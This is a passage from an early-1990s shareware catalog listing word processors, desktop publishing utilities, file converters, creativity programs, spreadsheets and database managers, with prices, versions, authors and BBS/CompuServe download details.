+ + within the program. During printing you will be informed as to + the number of pages read into the print buffer. + + Product: Ravitz Editor [***] + Text editor/outliner. See full description on page 131. + + Product: TDisplay + Creates Customized Self-Displaying Text Files. See full + description on page 40. + + + 3.3 Word processors + + See also: Writing applications, Text editors (page 127). + + Product: BOXER(tm) Text Editing System + Full featured Text Editor/Word Processor. See full description + on page 127. + + Product: Flex + Needs: IBM PC, DOS 2.1 or better. + Author: Logical Systems + Registration: $29.95 + Registration benefits: Personalized latest version, unlimited BBS + support, extra utilities. + Version: 1.02 (06-16-91) + User benefits: Personalized latest version, unlimited BBS + support, extra utilities. + Look for: FLEX*.LZH on BBSs (call 501-985-0059 to download it at + no charge); FLEX102.LZH in IBMPC RTC LIB 3 on GEnie. + Download size: 150k + Description: + Powerful multiwindow word processor. Block moves, macros, + configurable colors, supports 26 printers, EGA/VGA 43 and 50 + line modes, context-sensitive online help, smart tabbing and + indenting, optional auto-save or .BAK files, more. + + Product: KWIKWRITE + Needs: IBM PC, DOS 2.0 or better. 256k RAM. + Author: TexaSoft, 214-291-2115 + Registration: $35.00 + Registration benefits: Printed Manual, newsletter. + Version: 4.01 (01-01-91) + User benefits: Printed Manual, newsletter. + Look for: KWRITE.ZIP on BBSs; KWRITE.ZIP in IBMAPP forum LIB 2 on + CompuServe. + Download size: 250k + Description: + A small, simple to use word processor. It fits on one disk, and + is a good choice when you don't want to take up too much space + on your disk (like in a laptop). Creates and edits normal ASCII + files, so the editor can also be used for programming, writing + batch files or other ASCII files. Can merge information from + dBASE database (mail-merge). + + Chapter 3, "Writing applications" 134 + + + + Product: LQMATRIX [***] + Softfonts and softfont editor for Epson LQ. See full + description on page 50. + + Product: PACE + Needs: IBM PC, DOS 2.0 or better. + Author: Mark Tigges, 604-926-0366 + Registration: $45.00 + Registration benefits: Free upgrade and technical support. + Version: 1.0 (11-22-90) + User benefits: Free upgrade and technical support. + Look for: DOPPLER (multiple files) on BBSs (call 604-277-9970 to + download it at no charge). + Download size: 500k + Description: + Designed to supply to the public an easy to use, yet powerful + word processor, for an affordable price. With the first version + complete, the objective has been fullfilled. Has all of the + standard features, primed for speed and convience, and is a + word processing enviornment that fullfills. + + Major features include context sensitive help, DOS shell, + multiple file in-window editing and more. Plus files are not + restricted to a size limit. A powerful program that is easy to + learn. + + Product: pE - The "perfect" Editor(tm) + Windowed Text Editor/Word Processor. See full description on + page 129. + + Product: pEDIT PLUS + The personal EDITor PLUS. See full description on page 129. + + Product: QEdit(R) Advanced + FAST, compact, multi-file/window text editor. See full + description on page 130. + + Product: Save the Planet + Ozone & greenhouse data, easy word processor. See full + description on page 325. + + Chapter 3, "Writing applications" 135 + + + + Product: WordMaster + Needs: IBM PC, DOS 2.0 or better. 256k RAM. + Author: MasterWorks, 206-495-4574 + Registration: $30.00 + Registration benefits: Receive personalized copy of most recent + version without reminders. + Version: 1.7 (07-11-91) + User benefits: Receive personalized copy of most recent version + without reminders. + Look for: WDMASTER.EXE on BBSs (call 901-753-7213 to download it + at no charge); WDMSTR.EXE in IBMAPP forum LIB 2 on CompuServe; + WDMASTER.EXE in IBMPC RTC LIB 3 on GEnie. + Download size: 210k + Description: + Full-featured word processor with extensive pull-down menu + system and on-line help. Includes: multiple fonts, macros, + windows, search and replace, cutting/pasting text, headers/ + footers, automatic pagination, the ability to customize colors + and command structure and more. The documentation includes + examples of using various functions to help you work easier and + faster. + + + 3.4 Desktop publishing + + Product: ALPHAQUOTE + Typesetting and DTP Estimating. See full description on + page 339. + + Product: CODE TO CODE + Needs: IBM PC, DOS 3.0 or better. + Author: AlphaBytes, Inc., 202-546-4119 + Registration: $29.00 + Registration benefits: Latest version with printed manual and + free phone support. + Version: 4.0 (04-29-91) + User benefits: Latest version with printed manual and free phone + support. + Look for: CTOC40.ZIP on BBSs (call 414-789-4202 to download it at + no charge); CTOC40.EXE in DTPFORUM forum LIB 6 on CompuServe. + Download size: 143k + Description: + Automatically manages cryptic codes (such as or @HEAD = + )left in text files by typesetting and desktop publishing + programs. This new version can translate, strip or replace + codes in one pass. Now spell-check or run a thesaurus without + codes choking your system. CTC can work with DOS wildcards to + process many files with one command or it' s own built in menu + system. Other features include a graphic arts calculator, on- + line help, DOS shell and complete docs. + + Chapter 3, "Writing applications" 136 + + + + Product: Crossword Clipper for Windows + Needs: IBM AT (80286), Windows 3.0 or better. Crossword Creator + 5.0 for puzzle design. + Author: PC HELP-LINE, 714-797-3091 + Registration: $50.00 + Registration benefits: Printed manual, master disks, technical + support. + Version: 1.00 (02-01-92) + User benefits: Printed manual, master disks, technical support. + Look for: CWCLIP.ZIP on BBSs; CWCLIP.ZIP in IBMNEW forum LIB 8 on + CompuServe. + Download size: 200k + Description: + This crossword layout tool works with the Windows Clipboard, + enabling you to paste your puzzles into desktop publishing + applications. WYSIWYG display lets you resize the puzzle grid, + select fonts, etc. Also creates Windows bitmap (.BMP) graphic + files. + + Cannot be used for puzzle design, but will accept crossword + data files (.XWP format only) from other programs. A companion + program, Crossword Creator, is the preferred design tool. + + Product: Crossword Creator + Multi-lingual crossword puzzle editor. See full description on + page 413. + + Product: Decoder! + Needs: Unknown. + Author: Trinity Software, 703-791-2576 + Registration: $79.00 + Registration benefits: Printed manual, master disks, support, + free updates, upgrade discounts. + Version: 1.2 (09-13-91) + User benefits: Printed manual, master disks, support, free + updates, upgrade discounts. + Look for: availability unknown on BBSs; DECD12.ZIP in DTPFORUM + forum LIB 7 on CompuServe; DECD12.ZIP in IBMPC RTC LIB 15 on + GEnie. + Download size: 76k + Description: + Optimized for use with ASCII, Word, and WordPerfect, but will + strip most file formats. Handles quotes, dash and ellipses; + converts other 3-digit codes to ASCII equivalents. Runs in + seconds to make files useable by other applications. + + Chapter 3, "Writing applications" 137 + + + + Product: Filer! + Needs: Unknown. 640k RAM. + Author: Trinity Software, 703-791-2576 + Registration: $79.00 + Registration benefits: Printed manual, master disks, support, + free updates, upgrade discounts, bonus utilities. + Version: 1.92 (12-16-91) + User benefits: Printed manual, master disks, support, free + updates, upgrade discounts, bonus utilities. + Look for: availability unknown on BBSs; FIL192.ZIP in DTPFORUM + forum LIB 7 on CompuServe; FIL192.ZIP in IBMPC RTC LIB 15 on + GEnie. + Download size: 194k + Description: + Menu-driven file management system tracks all files, using 3 + windows to display a list of .PUB and .CHP files, a list of + files which make up the currently-selected .CHP, and text from + the largest file in the .CHP. Copy, delete, move, backup, + compress, decompress any combination of files. All internal + file pointers updated. Many more features; major application. + + Product: GEMCAP + Capture text/graphics screens in GEM .IMG fmt. See full + description on page 341. + + Product: Index! + Needs: Unknown. 400k RAM. + Author: Trinity Software, 703-791-2576 + Registration: $79.00 + Registration benefits: Printed manual, master disks, bonus + utilities, support, free updates, upgrade discounts. + Version: 1.4e (05-30-91) + User benefits: Printed manual, master disks, bonus utilities, + support, free updates, upgrade discounts. + Look for: availability unknown on BBSs; IND14E.ZIP in DTPFORUM + forum LIB 7 on CompuServe; IND14E.ZIP in IBMPC RTC LIB 15 on + GEnie. + Download size: 111k + Description: + Menu-driven indexing utility lets you enter terms to index in a + database. Then searches up to 100 chapters at a time, finds + every instance of your terms, builds and inserts the index + codes Ventura needs. Index preview option ensures proper + database entry. Automatic publication, chapter and file + selection. Easily reduces indexing time by 90%. + + Product: LQMATRIX [***] + Softfonts and softfont editor for Epson LQ. See full + description on page 50. + + Product: PM2LINO + Removes Ctrl-D characters from PostScript. See full + description on page 62. + + Chapter 3, "Writing applications" 138 + + + + Product: PRO-CR + Professional Optical Character Recognition. See full + description on page 339. + + Product: PS-TEXT + Extracts text from PostScript file to ASCII. See full + description on page 63. + + Product: QFont + Font editor for HP LaserJet soft fonts. See full description + on page 61. + + Product: Rubicon Publisher + Needs: IBM PC, DOS 2.1 or better. Disk space varies: 1.1MB for + 9-Pin, 1.5MB for 24-pin, 1.6MB for LaserJet 2, 1.0MB for + LaserJet 3 or Postscript. Optional preview requires VGA + monitor. + Author: Rubicon Computer Labs Inc., 819-770-4317 + Registration: $59.50 + Registration benefits: Printed manual. Hyphenologist, Times, + Helv, Classic & Nova Fonts. Third-Party Font Support. Optimal + Paragraph Composition, LaserJet Graphics. + Version: 2.2C (06-08-91) + User benefits: Printed manual. Hyphenologist, Times, Helv, + Classic & Nova Fonts. Third-Party Font Support. Optimal + Paragraph Composition, LaserJet Graphics. + Look for: availability unknown on BBSs. + Download size: 337k + Description: + Comprehensive desktop publisher based on traditional + typesetting concepts; over 120 features. Supports over 200 + printers including most popular 9 & 24 pin dot matrix, LaserJet + 2 & 3, & Postscript. Comes with 2 font families; supports + LaserJet 3 & Postscript fonts. Batch processor, controlled by + tags embedded in the input file. User's present word processor + or text editor can be used to prepare (Ascii) files for + publication. Screen preview provided for computers with VGA. + Great quality output! + + Chapter 3, "Writing applications" 139 + + + + Product: Swap! + Needs: Unknown. EGA/VGA monitors only (not SVGA); Microsoft- + compatible mouse; non-network environment. 1MB exp. or ext. + memory recommended. + Author: Trinity Software, 703-791-2576 + Registration: $49.00 + Registration benefits: Printed manual, master disks, support, + free updates, upgrade discounts, bonus utilities. + Version: 1.5 (11-26-90) + User benefits: Printed manual, master disks, support, free + updates, upgrade discounts, bonus utilities. + Look for: availability unknown on BBSs; SWP15A.ZIP in DTPFORUM + forum LIB 7 on CompuServe; SWP15A.ZIP in IBMPC RTC LIB 15 on + GEnie. + Download size: 72k + Description: + At the touch of a hot-key in Ventura, jump to the DOS prompt + and allows you to run any program (shell provides all but 11K + of pre-Ventura RAM), then return. Takes just 7K when not in + use. Swaps Ventura to expanded memory, extended memory or disk. + + Product: Tag! + Needs: Unknown. + Author: Trinity Software, 703-791-2576 + Registration: $59.00 + Registration benefits: Printed manual, master disks, support, + free updates, upgrade discounts, bonus utilities. + Version: 1.51 (05-02-91) + User benefits: Printed manual, master disks, support, free + updates, upgrade discounts, bonus utilities. + Look for: availability unknown on BBSs; TAG151.ZIP in DTPFORUM + forum LIB 7 on CompuServe; TAG151.ZIP in IBMPC RTC LIB 15 on + GEnie. + Download size: 125k + Description: + Menu-driven utility provides lightning-fast pre-tagging of + ASCII, Word and WordPerfect files for Ventura. Tags in one + window; paragraphs in another. Use mouse or hot-keys to apply + tags, or automate in 3 ways: replace one tag with another; + apply a tag to each paragraph with selected text; apply a cycle + of up to 10 tags through any part of a document. Ideal for long + docs with repetitive structures. + + + 3.5 File format translators + + See also: Utilities, File utilities, File conversion (page 38). + + Product: CODE TO CODE + DTP & Typesetting code conversion program. See full + description on page 135. + + Chapter 3, "Writing applications" 140 + + + + Product: ConvDW + Needs: IBM PC, DOS 2.0 or better. + Author: CrossCourt Systems, 517-332-4353 + Registration: $20.00 + Registration benefits: Latest version with printed manual plus + other shareware programs on disk. + Version: 1.2 (01-20-90) + User benefits: Latest version with printed manual plus other + shareware programs on disk. + Look for: CONVDW.ZIP on BBSs (call 517-353-5458 to download it at + no charge); CONVDW.ZIP in IBMAPP forum LIB 2 on CompuServe. + Download size: 20k + Description: + Converts IBM DisplayWrite 3, 4, or 5 files to ASCII. It is the + best available program of its type. Can drop soft returns or + convert to hard returns. Can expand tabs to spaces or retain + them, drop other unwanted spaces, and mark font attributes such + as underlining. IBM does not publish the file format for + DisplayWrite so this is one of only a handful of programs, + either shareware or commercial, that will read DW files. + + Product: Decoder! + Tag and Code Stripper for Ventura Publisher. See full + description on page 136. + + Product: PM2LINO + Removes Ctrl-D characters from PostScript. See full + description on page 62. + + Product: PS-TEXT + Extracts text from PostScript file to ASCII. See full + description on page 63. + + Product: Tag! + Automatic Pre-Tagging for Ventura Pub. Files. See full + description on page 139. + + Product: TextCon + Needs: IBM PC, DOS 2.0 or better. + Author: CrossCourt Systems, 517-332-4353 + Registration: $25.00 + Registration benefits: Latest release with printed manual plus + other shareware programs on disk. + Version: 1.73 (05-23-91) + User benefits: Latest release with printed manual plus other + shareware programs on disk. + Look for: TEXTCON.ZIP on BBSs (call 517-353-5458 to download it + at no charge); TEXTCN.ZIP in IBMAPP forum LIB 2 on CompuServe. + Download size: 41k + Description: + Reformats ASCII files for import to a word processor. Among + its features: strips carriage returns or adds them, as needed; + removes extraneous spaces; allows changes in line and paragraph + spacing. Its carriage return stripping is superb, properly + + Chapter 3, "Writing applications" 141 + + + + handling almost any paragraph style. Saves tremendous amount + of editing normally needed when importing ASCII files. Accepts + non-standard ASCII (pre-5.0 WordStar, Macintosh, and Unix). IBM + DCA/RFT output option available separately. + + Product: TextOut/5 + Needs: IBM PC, DOS 2.0 or better. + Author: CrossCourt Systems, 517-332-4353 + Registration: $20.00 + Registration benefits: Latest release with printed manual plus + other shareware programs on disk. + Version: 2.02 (06-09-91) + User benefits: Latest release with printed manual plus other + shareware programs on disk. + Look for: TEXTOUT5.ZIP on BBSs (call 517-353-5458 to download it + at no charge); TXTOUT.ZIP in WPSGA forum LIB 6 on CompuServe. + Download size: 36k + Description: + Converts WordPerfect 5.0 and 5.1 files to ASCII, with + improvements over WordPerfect's ASCII-output capabilities. + Features include: translation of all text, including footnotes, + endnotes, tables, text and equation boxes, and comments; can + mark many formatting attributes, such as bold or italic, with + custom ASCII strings; better translation of WP's extended + character sets; optional page-format output; reformatting to + new line length; faster than Text Out; and allows wildcard + filenames. + + + 3.6 Dictionaries + + Product: PC-GLOSSARY [***] + Glossary of microcomputer & networking terms. See full + description on page 316. + + + 3.7 Document boilerplates + + 3.7.1 Business specific + + See also: Business (page 190). + + Product: Business Plan Master (IBM) + Professional business plan templates. See full description on + page 219. + + Product: Business Plan Master (Mac) + Professional business plan templates. See full description on + page 219. + + Chapter 3, "Writing applications" 142 + + + + 3.8 Creativity & brainstorming + + Product: Babble! + Needs: IBM PC, DOS 2.0 or better. 400k RAM. + Author: Korenthal Associates, Inc., 212-242-1790 + Registration: $25.00 + Registration benefits: Typeset manual, nifty keyboard template, + many more writing samples to enhance their enjoyment of the + product, free technical support and notification of major + upgrades. + Version: 2.0 (02-08-91) + User benefits: Typeset manual, nifty keyboard template, many more + writing samples to enhance their enjoyment of the product, free + technical support and notification of major upgrades. + Look for: BAB200.ZIP on BBSs (call 718-837-3236 to download it at + no charge); BAB200.ZIP in PCVENB forum LIB 3 on CompuServe; + BAB200.ZIP in IBMPC RTC LIB 7 on GEnie. + Download size: 158k + Description: + Spur your creativity and cure writer's block with Babble!, an + automatic writing program. Analyzes samples of text for style + and content, and then generates a steady stream of nonsensical + prose. Mix Shakespeare with Harold Robbins (or import your own + writings); apply special effects like Stutter and Subliminal. + Text is controlled on-the-fly using the unique "text-mixing + studio" control panel, and changes appear instantly. + "Wonderfully funny but useful," says PC Magazine (5/14/91). + + Product: Creativity Package + Needs: IBM PC, DOS 2.0 or better. 400k RAM. + Author: R.K. West Consulting + Registration: $34.00 + Registration benefits: Latest version, printed manual, free mail + support, CIS support, 900-number phone support, upgrade + notices. + Version: 3.1 (03-01-92) + User benefits: Latest version, printed manual, free mail support, + CIS support, 900-number phone support, upgrade notices. + Look for: CREATE*.ZIP (multiple files) on BBSs; CRTV*.ZIP in + IBMAPP forum LIB 11 (multiple files) on CompuServe. + Download size: 1k + Description: + 3-disk set for writers, teachers, students, executives -- + anyone who must produce fresh ideas. Includes a complete book + on creativity enhancement, software for computer-aided + brainstorming, and a poetry writing program. + + Chapter 3, "Writing applications" 143 + + + + Product: NEWBIZ + Needs: IBM PC, DOS 3.2 or better. CGA monitor recommended. + Author: Centre for Commercial Innovation (CCI) + Registration: $24.95 + Registration benefits: Support, free updates. + Version: 1.0 (03-08-92) + User benefits: Support, free updates. + Look for: availability unknown on BBSs; NEWBIZ.ZIP in IBMAPP + forum LIB 7 on CompuServe. + Download size: 143k + Description: + Nobody ever got rich working for somebody else! So why not take + charge of your life, set up a business of your own and become + prosperous? Here is an exciting and effective Brainstorming + Program that will assist you in dreaming up- and evaluating + ideas to start your own business on a shoestring, based on the + tangible and intangible assets THAT YOU ALREADY HAVE! You can + also use it as a standalone Personal Decision Support System. + + Product: PoeTrio [***] + Three interactive poetry tutors with editors. See full + description on page 315. + + Product: Poetry Generator + Needs: IBM PC, DOS 2.1 or better. 400k RAM. + Author: R.K. West Consulting + Registration: $29.00 + Registration benefits: Latest version, free mail support, CIS + support, 900-number phone support, upgrade notification. + Version: 2.1 (06-01-91) + User benefits: Latest version, free mail support, CIS support, + 900-number phone support, upgrade notification. + Look for: POETRY*.ZIP on BBSs; POET*.ZIP in IBMNEW forum LIB 8 on + CompuServe. + Download size: 1k + Description: + Turn your computer into a poet! Using a 20,000-word vocabulary, + this program creates free-verse poems at the touch of a button. + Using the structure of actual poems as models, the program + randomly combines words and short phrases into verses 4 to 9 + lines long. The results as fascinating. Some of these poems + have actually been published in national magazines. This + program has been featured in the Los Angeles Times, Scientific + American, Writer's Digest. + + Product: Poetry Star [***] + AI poetry writing for entertainment, educ. See full + description on page 423. + + Chapter 3, "Writing applications" 144 + + + + 3.9 Software tools + + 3.9.1 For multiple programs + + Product: PCX2FNT [***] + Create fonts for LaserJet from PCX graphics. See full + description on page 60. + + Product: PUTMAIL + Librarian Utility for PVCS. See full description on page 298. + + 3.9.2 For Word + + 3.9.2.1 Word for Windows + + Product: Dinger + Needs: IBM PC, Windows 3.0 or better. Word for Windows. + Author: Pinecliffe International, 303-642-0604 + Registration: $19.00 + Registration benefits: Latest version on disk; Font help; + Discounts! + Version: 2.0 (02-15-91) + User benefits: Latest version on disk; Font help; Discounts! + Look for: DNGR20.ZIP on BBSs; DNGR20.ZIP in MSAPP forum LIB 12 on + CompuServe. + Download size: 55k + Description: + Gives you lightning-fast access to the bullet, em-dash, section + mark, copyright, arrow, and other common symbols, dingbats, and + "Foreign" characters. Also lets you get at any character in any + font with a couple of mouse clicks. Looking for the + ZapfDingbat finger? The Times Roman "Yen" sign? How about a + "(c)" in Helvetica? You don't need to go diving for the + printer manual any more, or tape another yellow sticky-note on + the monitor. Dinger shows how easy it can be! + + Product: Enveloper + Needs: IBM PC, Windows 3.0 or better. Word for Windows. HP + LaserJet or DeskJet printer. + Author: Pinecliffe International, 303-642-0604 + Registration: $29.00 + Registration benefits: Printed manual, latest disks and tips, + Cheat Sheet, Discounts. + Version: 3.2 (05-07-91) + User benefits: Printed manual, latest disks and tips, Cheat + Sheet, Discounts. + Look for: ENVR32.ZIP on BBSs; ENVR32.ZIP in MSAPP forum LIB 12 on + CompuServe. + Download size: 120k + Description: + The fastest, easiest envelopes you've ever printed... Write + your letter. Click on "File" then "Enveloper". Check and make + sure Enveloper grabbed the address correctly. Click OK. Your + envelope comes out the printer, formatted the way you want it, + + Chapter 3, "Writing applications" 145 + + + + with your logo or return address, and (on lasers) a complete + postal bar code. + + Lots of options: multiple return addresses; all sorts of fonts, + bold, italic, point sizes; LOGOS!; even a new print/merge + facility that works from existing merge docs. + + Product: WOPR-WinWord Office POWER Pack + Needs: IBM PC, Windows 3.0 or better. Word for Windows. + Author: Pinecliffe International, 303-642-0604 + Registration: $49.00 + Registration benefits: Printed Enveloper manual, latest disk, + tips, support, Discounts! + Version: 1.0 (07-07-91) + User benefits: Printed Enveloper manual, latest disk, tips, + support, Discounts! + Look for: availability unknown on BBSs; WOPR*.EXE in MSAPP forum + LIB 1 (multiple files) on CompuServe. + Download size: 410k + Description: + The largest, most powerful collection of WinWord macros ever + assembled. Includes Enveloper (prints envelopes on LaserJets, + DeskJets, compatibles), PostScript Enveloper, 2 X 4 (prints any + document duplex or 4-up), a new File New (helps you keep track + of your templates and actually use them), Treasure (hunt for + new, useful menu assignments and macros you can use every day), + Dinger, WOPRClock, Labelit, Fancy Keys, Killer, Word Counter, + and much more. + + 3.9.3 For WordPerfect + + Product: dPerfect Merge [***] + Converts xBase to Word Perfect secondary file. See full + description on page 38. + + 3.9.4 For other + + Product: Btr Help! + Btrieve File Utility. Repair, Edit, Browse. See full + description on page 299. + + Product: Changer/2 + Changes files without word a processor. See full description + on page 300. + + Product: Decoder! + Tag and Code Stripper for Ventura Publisher. See full + description on page 136. + + Product: Filer! + Visual File Management for Ventura Publisher. See full + description on page 136. + + Chapter 3, "Writing applications" 146 + + + + Product: Index! + Automatic Index Coding for Ventura Publisher. See full + description on page 137. + + Product: JEPRS (Jeepers!) + Bibliographic Database Management System. See full description + on page 172. + + Product: Over_LAZ + HP LaserJet overlays and letterheads. See full description on + page 59. + + Product: Over_LAZ PS + PostScript overlays and letterheads. See full description on + page 61. + + Product: PSEARCH + Fast tool to search for files with text words. See full + description on page 19. + + Product: RECALL + Needs: IBM PC, DOS 3.0 or better. + Author: Patri-Soft, 714-352-2820 + Registration: $20.00 + Registration benefits: Latest version and updates with BBS + support. Money Back Gurantee. + Version: 2.5 (04-11-91) + User benefits: Latest version and updates with BBS support. Money + Back Gurantee. + Look for: RECALL25.ZIP on BBSs (call 714-352-2825 to download it + at no charge); RECALL.ZIP in IBMAPP forum LIB 6 on CompuServe. + Download size: 74k + Description: + Provides advanced file selection for Wordperfect and other word + processing program. Enhances WordPerfect file selection by + providing sorted file lists, especially list sorted by date. + This allows you to locate files you most recently worked on. + Has a WordPerfect and text file viewer. It also can drive any + other program provided a command parameter can be the selected + filename. Features include text search, pattern matching and + more. + + Product: Swap! + Instant DOS Shell for Ventura Publisher Gem. See full + description on page 138. + + Product: Tag! + Automatic Pre-Tagging for Ventura Pub. Files. See full + description on page 139. + + Product: WinEdit + Perfect ASCII editor for Windows 3.0. See full description on + page 131. + + Chapter 3, "Writing applications" 147 + + + + 3.10 Other + + Product: ClipMate for Windows [***] + Captures Multiple Clipboard Text Items. See full description + on page 91. + + Chapter 4, "Spreadsheet applications" 148 + + + + + + Chapter 4 + Spreadsheet applications + + See also: Finances (page 239); Business (page 190). + + + 4.1 Spreadsheet programs + + Product: ALITE + Needs: IBM PC, DOS 2.11 or better. 256k RAM; CGA or Hercules + monitor. + Author: TRIUS, Inc., 508-794-9377 + Registration: $25.00 + Registration benefits: Printed manual, master disks, 90-day + support, newsletter, update discounts. + Version: 1.10f (12-15-91) + User benefits: Printed manual, master disks, 90-day support, + newsletter, update discounts. + Look for: ALITE.ZIP on BBSs (call 617-354-2505 to download it at + no charge); ALITE.ZIP in IBMAPP forum LIB 6 on CompuServe. + Download size: 200k + Description: + Powerful Spreadsheet that will run even on a system with only + 256K RAM! 2048 rows by 128 columns. Line, X-Y, Bar, Pie and + Stacked Bar Graphs. Macro Command Language, Mathematical, + Statistical, Financial, Date and String Functions. WKS and WK1 + file compatible. Data Regression, Data Question and Data Bin + operations. File Import, Export and Merge, PIC file + generation, and File Linking. Split Windows, Block Protection, + Matrix Operations, and much more... + + Product: AS-EASY-AS [***] + Needs: IBM PC, DOS 2.11 or better. 382k RAM; CGA or Hercules + monitor. + Author: TRIUS, Inc., 508-794-9377 + Registration: $75.00 + Registration benefits: Printed manual, master disks, newsletter, + 90-day support, upgrade discounts. + Version: 5.01b (04-07-92) + User benefits: Printed manual, master disks, newsletter, 90-day + support, upgrade discounts. + Look for: ASEASY.ZIP on BBSs (call 617-354-2505 to download it at + no charge); ASEASY.ZIP in IBMAPP forum LIB 6 on CompuServe. + Download size: 210k + Special instructions: Product distribution restricted to the + United States. + Description: + Powerful 8192 rows by 256 columns Spreadsheet. EMS and Virtual + Memory Support. Fully Mouseable. Print Preview Mode with + Headers, Footers, etc. Math, Statistical, Financial, Logical, + Date/Time, String and User Defined Functions. Text & Graphics + on same page. 12 Graph Types, (log scales, split graphs). 9- + + Chapter 4, "Spreadsheet applications" 149 + + + + pin, 24-pin and Laserjet Support. WKS and WK1 File Compatible. + Powerful Macro Language. Goalseeking, dBASE File Export/ + Import, File Merge & File Linking. Matrix Operations, much + more... + + + 4.2 Boilerplates/templates + + Product: Business Plan Master (Mac) + Professional business plan templates. See full description on + page 219. + + + 4.3 Software tools + + 4.3.1 For multiple programs + + Product: 4Print + Paper saving utility for LaserJets & DeskJets. See full + description on page 54. + + 4.3.2 For Lotus + + Product: Total Investor for 1-2-3 + Portfolio Manager/Technical Analysis Template. See full + description on page 241. + + Product: Total Investor for Symphony + Portfolio Manager/Technical Analysis Template. See full + description on page 241. + + + 4.4 Other + + Product: LJLAND [***] + Print docs, listings, manuals, spreadsheets. See full + description on page 59. + + Chapter 5, "Database applications" 150 + + + + + + Chapter 5 + Database applications + + See also: Data (page 174). + + + 5.1 Relational database managers + + Product: HouseHold TRACKER + Needs: IBM PC, DOS 3.3 or better. + Author: Fischer Grafix & Software + Registration: $20.00 + Registration benefits: Master disks, phone support. + Version: 1.3a (02-10-92) + User benefits: Master disks, phone support. + Look for: FMSHT.ZIP on BBSs; FMSHT.ZIP in IBMAPP forum LIB 7 on + CompuServe. + Download size: 183k + Special instructions: Product distribution restricted to the + United States. + Description: + This program keeps track of many of the items around the house + in one database. Items like household goods (model #'s, serial + #'s, cost, warranties, etc.), auto repairs, VCR tapes, magazine + subscriptions, phone list, utilities and credit cards. The + program will print your list for insurance purposes or make a + label for your VCR tape. Easy to use menus. + + Product: Movie Guide + Catalog Movies with full multimedia support. See full + description on page 361. + + Product: PC-HAM + HAM logging, contest and SS game simulation. See full + description on page 370. + + Chapter 5, "Database applications" 151 + + + + Product: SR-Info + Needs: IBM PC, DOS 2.1 or better. 512k RAM. + Author: Sub Rosa Publishing Inc., 416-398-8414 + Registration: $100.00 + Registration benefits: Bound manual over 500 typeset pages; free + tech support by mail/fax/CIS; half hour free phone support; + discount on 'Info Discozine' (magazine-on-a-disk). + Version: 3.30 (09-01-91) + User benefits: Bound manual over 500 typeset pages; free tech + support by mail/fax/CIS; half hour free phone support; discount + on 'Info Discozine' (magazine-on-a-disk). + Look for: SRI30*.ZIP (multiple files) on BBSs. + Download size: 700k + Description: + Most powerful full-featured relational database language in + shareware world. Complete procedural language with compiler, + plus "conversational" mode. Language VP-Info compatible; + handles dBASE/Clipper data files without conversion. Now + supports dBASE memo fields. Maximum 6 data files with multiple + active indexes at same time; 65,000 records. Full suite of + commented sample programs to use as models for your own + projects. Outperforms most $795 products; it's easier to learn + and faster to program. + + Product: STAFF-BASE + Needs: IBM PC, DOS 3.0 or better. 640k RAM. Hard disk + recommended. + Author: MSC - Morariu Software Consulting, 0049-6196-48524 + Registration: $69.00 + Registration benefits: Printed manual, latest version of + software, selfrunning DEMO-TUTOR developed with Dan Bricklins + Demo II, phone support. + Version: 3.0 (01-01-91) + User benefits: Printed manual, latest version of software, + selfrunning DEMO-TUTOR developed with Dan Bricklins Demo II, + phone support. + Look for: availability unknown on BBSs; STAFF3.ZIP in IBMAPP + forum LIB 3 on CompuServe. + Download size: 300k + Special instructions: Product distribution restricted to the + United States. + Description: + DBMS productivity tool designed for minimizing keystrokes. + Innovative features: data viewing and input via powerful data- + table, copy range of cells, replicate content of cell, search + and replace, change character case (upper,lower,proper) in cell + or globally. Complex relational structures by means of the + dBLOOKUP feature. Simple filtering, complex query and sorting, + data import/export, statistics for filtered data, data base + housekeeping, report/label generator, macros, access to + external files... + + Chapter 5, "Database applications" 152 + + + + Product: STAFF-DBMS-PRODUCT-FAMILY + Needs: IBM PC, DOS 3.0 or better. 640k RAM; Hard Disk. + Author: MSC - Morariu Software Consulting, 0049-6196-48524 + Registration: $250.00 + Registration benefits: See each STAFF module: INTEGRATOR, BASE, + GRAF, REPORT, UTIL, KICK, DIAL, MASK. + Version: XX (06-01-91) + User benefits: See each STAFF module: INTEGRATOR, BASE, GRAF, + REPORT, UTIL, KICK, DIAL, MASK. + Look for: availability unknown on BBSs. + Download size: 2000k + Special instructions: Product distribution restricted to the + United States. + Description: + Product family designed to give the user specialized tools for + managing day to day operations with large amounts of data. A + consistent user interface is common to all modules. You can + custom design your DBMS tool by integrating only the needed + modules. STAFF-BASE is the database engine. Check the other + STAFF modules for Graphics, Relational Reports, Miscellaneous + Utilities, TSR Database Engine, Dialing from DBF file, Mask + generation and use, RunTime Module for developers of database + applications.. + + Product: STAFF-DEVELOPER + Free RunTime Licence for Database Engines. See full + description on page 431. + + Product: STAFF-KICK + Needs: IBM PC, DOS 3.0 or better. 640k RAM. Extended or expanded + memory and hard disk recommended. + Author: MSC - Morariu Software Consulting, 0049-6196-48524 + Registration: $39.00 + Registration benefits: Printed manual, latest version on disk, + and phone support. + Version: 2.0 (01-01-91) + User benefits: Printed manual, latest version on disk, and phone + support. + Look for: availability unknown on BBSs; STFKIC.ZIP in IBMAPP + forum LIB 3 on CompuServe. + Download size: 340k + Special instructions: Product distribution restricted to the + United States. + Description: + The TSR version of STAFF-BASE. It is recommendable to be used + in parallel with spreadsheets, word processors, or large + applications. Extended or expanded memory is identified + automatically and swapping from and to any application is + instantaneous. When no extended or expanded memory is available + the swapping is taking place between the hard disk and the + memory, resulting in a slower implementation. Dialing can be + performed when the cursor is placed on a valid phone number.... + + Chapter 5, "Database applications" 153 + + + + Product: STAFF-MASK + Needs: IBM PC, DOS 3.0 or better. 640k RAM, Hard disk. + Author: MSC - Morariu Software Consulting, 0049-6196-48524 + Registration: $49.00 + Registration benefits: Printed manual, latest version on disk, + phone support. + Version: 1.2 (06-01-91) + User benefits: Printed manual, latest version on disk, phone + support. + Look for: availability unknown on BBSs; STFMAS.ZIP in IBMAPP + forum LIB 3 on CompuServe. + Download size: 200k + Special instructions: Product distribution restricted to the + United States. + Description: + Allows you to create without traditional programming effort + masks for data entry, viewing, and editing. The data entry + cells can be set up for data validation purposes. Data entry + can be performed using the classic double entry mode and + automatic checking, giving the possibility of correction. + Filtering and powerfull queries allow efficient data retreival + for viewing and editing purposes. The dBLOOKUP allows an + efficient data entry and viewing system by showing other DBFs + as data tables. + + Product: STAFF-REPORT + Relational Report Generator for DBF files. See full + description on page 173. + + Product: WAMPUM + Needs: IBM PC, DOS 2.1 or better. Hard disk or two 720K floppy + drives. 512k RAM. + Author: Ward Mundy Software, 404-237-9420 + Registration: $50.00 + Registration benefits: 